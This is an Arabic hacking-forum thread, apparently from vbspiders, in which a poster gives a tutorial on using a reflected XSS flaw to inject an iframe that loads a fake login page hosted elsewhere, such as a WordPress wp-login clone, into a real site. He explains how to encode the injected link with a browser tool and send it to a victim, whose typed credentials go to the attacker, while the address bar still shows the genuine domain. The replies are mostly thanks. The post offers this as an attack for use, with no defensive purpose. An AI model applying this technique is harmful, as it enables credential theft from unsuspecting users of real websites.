|
جديد استخدامات xss وهي الـ phishing login السلام عليكم هذا استخدام غير معروف لثغرة xss:2: تعبت في عمل الفيديو والشرح راجاء اعمل تقييم ويمنتنع رودوم من نوع شكراً الفكرة تعتمد على الدمج بين الصفحات المزورة واترككم مع الفيديو خخخخخخخ حمل الفيديو من هنا تحميييييل ~~~~~~~~~~~~~~~~~~~~ ~ بسم الله الرحمن الرحيم السلام عليكم معكم IronMan من شبكة العناكب الاحترافية درسنا اليوم هو عن استغلال شبه غير معروف عن ثغرة XSS وهو XSS phishing اي الخداع عن طريق هذه الثغرة، طبعا الكل يعرف سرقة الكوكيز ولكن لماذا لان نستخدم هذه الثغرة في حقن اكواد HTML في الصفحة؟ سنرى الطريقة تابعوا معي هذا كود بسيط نصبته في local server وصنعت ثغرة xss بسيطة المتغير المصاب هو x قبل ما نحقنه نشوف عدة خطوات وهي انك ترفع صفحة مزورة على موقع ثاني لنقل httP://mysite.com/phishing.php لازم تكون من نفس لوحة التحكم للسكربت الحابي تخترقه يعني مثال ويرد برس نأتي الان لخطوة الحقن وهي استخدام هذا الكود <****** frameborder=0 src=http://www.yoursite.com/wp-login.php? height=700px width=1250px ></******> لاحظ رابط الصفحة المزورة يجب ان تتأكد منه وتعدل ه بما يناسبك لازم تظبط ابعاد الصفحة قبل ما ترسلها يعني صفحة ملغمة لا تنسى انه كود form action يرسل البيانات لك او يحفظها تقريبا شبيه بخطوات حفظ الكوكيز ، المهم عندما نحقن الكود اعلاه في الصفحة ستظهر لوحة التحكم ويمكنك ارسالها للمستهدف ، بعد ما تشفر الكود الاخير بأي اداة من ادوات hackbar تلك لاضافة في الفاير فوكس ابحث عنها في قوقل ولا تكون كسلان وليصبح الرابط في النهاية http://localhost/mblue_u/test.php?x=...E%3C/******%3E وبكذا ترسلوا الرابط للضحية او تتفننوا علي كيفيكم مثل ما تسرقون الكوكيز يمكنك ان تصنع صفحة مزورة بهذه الطريقة ول ايشك ابدا حتى لو نظر للعنوان سيجد انه في الموقع وبكذا انتهى الدرس اخوكم / ايرون مان هكر شبكة العناكب الاحترافية vbspiders.com/vb/ |
رد: جديد استخدامات xss وهي الـ phishing login هههه عملت الفيديوا اذن ... بارك الله فيك ... لي عوده ... |
رد: جديد استخدامات xss وهي الـ phishing login |
رد: جديد استخدامات xss وهي الـ phishing login thxxxx |
رد: جديد استخدامات xss وهي الـ phishing login لكن كذا دفنت الموضوع كان تتركه اسبوع |
رد: جديد استخدامات xss وهي الـ phishing login هيك احسن هههه |
رد: جديد استخدامات xss وهي الـ phishing login نو نو ما احسن ولا شيء هذا يعتبر دمج ما بين قسم البريد واختراق المواقع ههههه |
رد: جديد استخدامات xss وهي الـ phishing login nice merci bcp |
رد: جديد استخدkمات xss وهي الـ phishing login thanks u very much |
رد: جديد استخدامات xss وهي الـ phishing login شـكــ وبارك الله فيك ـــرا لك |
رد: جديد استخدامات xss وهي الـ phishing login موضوع اكثر من رائع |
رد: جديد استخدامات xss وهي الـ phishing login ماد لو حطية باتش بدل الصفح |
رد: جديد استخدامات xss وهي الـ phishing login بارك الله فيك يا أخي الكريم على هذا الدرس القيم و جزاك الله عنا خير الجزاء |
رد: جديد استخدامات xss وهي الـ phishing login مشكـــــور تسلم ثغرة حلوة |
رد: جديد استخدامات xss وهي الـ phishing login thanxxxxxxxxxxxxxxxxxx |
رد: جديد استخدامات xss وهي الـ phishing login يعطيكـُ العآفيهـُ... [وآًصل] |
رد: جديد استخدامات xss وهي الـ phishing login بارك الله فيك يا أخي الكريم على هذا الدرس القيم و جزاك الله عنا خير الجزاء |
رد: جديد استخدامات xss وهي الـ phishing login مشكورررررررررررررررررررررر |
رد: جديد استخدامات xss وهي الـ phishing login يعطيك العآآآآآفية |
رد: جديد استخدامات xss وهي الـ phishing login يعطيييييك ألف عافيه خيؤؤ |
رد: جديد استخدامات xss وهي الـ phishing login بارك الله فيك أخي |
رد: جديد استخدامات xss وهي الـ phishing login gooooooooooooood |
رد: جديد استخدامات xss وهي الـ phishing login بارك الله فيك اخي الكريم |
رد: جديد استخدامات xss وهي الـ phishing login شكررررررررررررررررررررا |
رد: جديد استخدامات xss وهي الـ phishing login بارك الله فيك ... |
رد: جديد استخدامات xss وهي الـ phishing login goood THX:5::5::5::5: |
رد: جديد استخدامات xss وهي الـ phishing login شكرااااااااا لك اخي |
رد: جديد استخدامات xss وهي الـ phishing login مشكوووووو |
رد: جديد استخدامات xss وهي الـ phishing login مشكوررر |
| الساعة الآن 08:21 AM |
[ vBspiders.Com Network ]